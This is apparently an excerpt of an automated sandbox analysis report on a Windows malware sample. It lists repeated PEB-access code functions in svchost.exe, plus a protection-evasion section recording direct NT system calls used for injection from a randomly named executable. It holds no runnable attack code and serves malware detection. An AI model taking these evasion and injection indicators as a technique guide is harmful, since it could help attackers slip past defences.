                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA456 mov eax, dword ptr fs:[00000030h]1_2_030EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302645D mov eax, dword ptr fs:[00000030h]1_2_0302645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305245A mov eax, dword ptr fs:[00000030h]1_2_0305245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC460 mov ecx, dword ptr fs:[00000030h]1_2_030BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA49A mov eax, dword ptr fs:[00000030h]1_2_030EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030364AB mov eax, dword ptr fs:[00000030h]1_2_030364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030644B0 mov ecx, dword ptr fs:[00000030h]1_2_030644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BA4B0 mov eax, dword ptr fs:[00000030h]1_2_030BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030304E5 mov ecx, dword ptr fs:[00000030h]1_2_030304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104B00 mov eax, dword ptr fs:[00000030h]1_2_03104B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EB20 mov eax, dword ptr fs:[00000030h]1_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F8B28 mov eax, dword ptr fs:[00000030h]1_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4B4B mov eax, dword ptr fs:[00000030h]1_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03102B57 mov eax, dword ptr fs:[00000030h]1_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6B40 mov eax, dword ptr fs:[00000030h]1_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D8B42 mov eax, dword ptr fs:[00000030h]1_2_030D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB40 mov eax, dword ptr fs:[00000030h]1_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028B50 mov eax, dword ptr fs:[00000030h]1_2_03028B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEB50 mov eax, dword ptr fs:[00000030h]1_2_030DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CB7E mov eax, dword ptr fs:[00000030h]1_2_0302CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040BBE mov eax, dword ptr fs:[00000030h]1_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]1_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E4BB0 mov eax, dword ptr fs:[00000030h]1_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030BCD mov eax, dword ptr fs:[00000030h]1_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEBD0 mov eax, dword ptr fs:[00000030h]1_2_030DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038BF0 mov eax, dword ptr fs:[00000030h]1_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BCBF0 mov eax, dword ptr fs:[00000030h]1_2_030BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BCA11 mov eax, dword ptr fs:[00000030h]1_2_030BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA24 mov eax, dword ptr fs:[00000030h]1_2_0306CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EA2E mov eax, dword ptr fs:[00000030h]1_2_0305EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]1_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03054A35 mov eax, dword ptr fs:[00000030h]1_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA38 mov eax, dword ptr fs:[00000030h]1_2_0306CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036A50 mov eax, dword ptr fs:[00000030h]1_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]1_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040A5B mov eax, dword ptr fs:[00000030h]1_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CA6F mov eax, dword ptr fs:[00000030h]1_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DEA60 mov eax, dword ptr fs:[00000030h]1_2_030DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]1_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030ACA72 mov eax, dword ptr fs:[00000030h]1_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA80 mov eax, dword ptr fs:[00000030h]1_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104A80 mov eax, dword ptr fs:[00000030h]1_2_03104A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068A90 mov edx, dword ptr fs:[00000030h]1_2_03068A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]1_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038AA0 mov eax, dword ptr fs:[00000030h]1_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03086ACC mov eax, dword ptr fs:[00000030h]1_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030AD0 mov eax, dword ptr fs:[00000030h]1_2_03030AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]1_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064AD0 mov eax, dword ptr fs:[00000030h]1_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]1_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306AAEE mov eax, dword ptr fs:[00000030h]1_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]1_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE908 mov eax, dword ptr fs:[00000030h]1_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC912 mov eax, dword ptr fs:[00000030h]1_2_030BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]1_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028918 mov eax, dword ptr fs:[00000030h]1_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B892A mov eax, dword ptr fs:[00000030h]1_2_030B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C892B mov eax, dword ptr fs:[00000030h]1_2_030C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0946 mov eax, dword ptr fs:[00000030h]1_2_030B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104940 mov eax, dword ptr fs:[00000030h]1_2_03104940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]1_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]1_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC97C mov eax, dword ptr fs:[00000030h]1_2_030BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]1_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]1_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov esi, dword ptr fs:[00000030h]1_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]1_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]1_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C69C0 mov eax, dword ptr fs:[00000030h]1_2_030C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030649D0 mov eax, dword ptr fs:[00000030h]1_2_030649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA9D3 mov eax, dword ptr fs:[00000030h]1_2_030FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE9E0 mov eax, dword ptr fs:[00000030h]1_2_030BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]1_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]1_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC810 mov eax, dword ptr fs:[00000030h]1_2_030BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov ecx, dword ptr fs:[00000030h]1_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A830 mov eax, dword ptr fs:[00000030h]1_2_0306A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]1_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]1_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060854 mov eax, dword ptr fs:[00000030h]1_2_03060854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034859 mov eax, dword ptr fs:[00000030h]1_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034859 mov eax, dword ptr fs:[00000030h]1_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE872 mov eax, dword ptr fs:[00000030h]1_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE872 mov eax, dword ptr fs:[00000030h]1_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6870 mov eax, dword ptr fs:[00000030h]1_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6870 mov eax, dword ptr fs:[00000030h]1_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030887 mov eax, dword ptr fs:[00000030h]1_2_03030887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC89D mov eax, dword ptr fs:[00000030h]1_2_030BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031008C0 mov eax, dword ptr fs:[00000030h]1_2_031008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA8E4 mov eax, dword ptr fs:[00000030h]1_2_030FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C8F9 mov eax, dword ptr fs:[00000030h]1_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C8F9 mov eax, dword ptr fs:[00000030h]1_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E6F00 mov eax, dword ptr fs:[00000030h]1_2_030E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CF1F mov eax, dword ptr fs:[00000030h]1_2_0306CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305EF28 mov eax, dword ptr fs:[00000030h]1_2_0305EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4F40 mov eax, dword ptr fs:[00000030h]1_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4F40 mov eax, dword ptr fs:[00000030h]1_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4F40 mov eax, dword ptr fs:[00000030h]1_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4F40 mov eax, dword ptr fs:[00000030h]1_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4F42 mov eax, dword ptr fs:[00000030h]1_2_030D4F42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CF50 mov eax, dword ptr fs:[00000030h]1_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CF50 mov eax, dword ptr fs:[00000030h]1_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CF50 mov eax, dword ptr fs:[00000030h]1_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CF50 mov eax, dword ptr fs:[00000030h]1_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CF50 mov eax, dword ptr fs:[00000030h]1_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302CF50 mov eax, dword ptr fs:[00000030h]1_2_0302CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CF50 mov eax, dword ptr fs:[00000030h]1_2_0306CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D0F50 mov eax, dword ptr fs:[00000030h]1_2_030D0F50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305AF69 mov eax, dword ptr fs:[00000030h]1_2_0305AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305AF69 mov eax, dword ptr fs:[00000030h]1_2_0305AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2F60 mov eax, dword ptr fs:[00000030h]1_2_030D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2F60 mov eax, dword ptr fs:[00000030h]1_2_030D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104F68 mov eax, dword ptr fs:[00000030h]1_2_03104F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306CF80 mov eax, dword ptr fs:[00000030h]1_2_0306CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03062F98 mov eax, dword ptr fs:[00000030h]1_2_03062F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03062F98 mov eax, dword ptr fs:[00000030h]1_2_03062F98
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001280C9 GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_001280C9
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000FA124 SetUnhandledExceptionFilter,0_2_000FA124
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000FA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000FA155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtTerminateThread: Direct from: 0x77D32FCCJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtSetInformationThread: Direct from: 0x77D263F9Jump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtQueryInformationToken: Direct from: 0x77D32CACJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtCreateFile: Direct from: 0x77D32FECJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtOpenFile: Direct from: 0x77D32DCCJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtSetInformationProcess: Direct from: 0x77D32C5CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtProtectVirtualMemory: Direct from: 0x77D32F9CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtOpenKeyEx: Direct from: 0x77D32B9CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtResumeThread: Direct from: 0x77D336ACJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtMapViewOfSection: Direct from: 0x77D32D1CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtWriteVirtualMemory: Direct from: 0x77D32E3CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtCreateMutant: Direct from: 0x77D335CCJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtNotifyChangeKey: Direct from: 0x77D33C2CJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtQuerySystemInformation: Direct from: 0x77D32DFCJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtReadFile: Direct from: 0x77D32ADCJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeNtAllocateVirtualMemory: Direct from: 0x77D32BFCJump to behavior
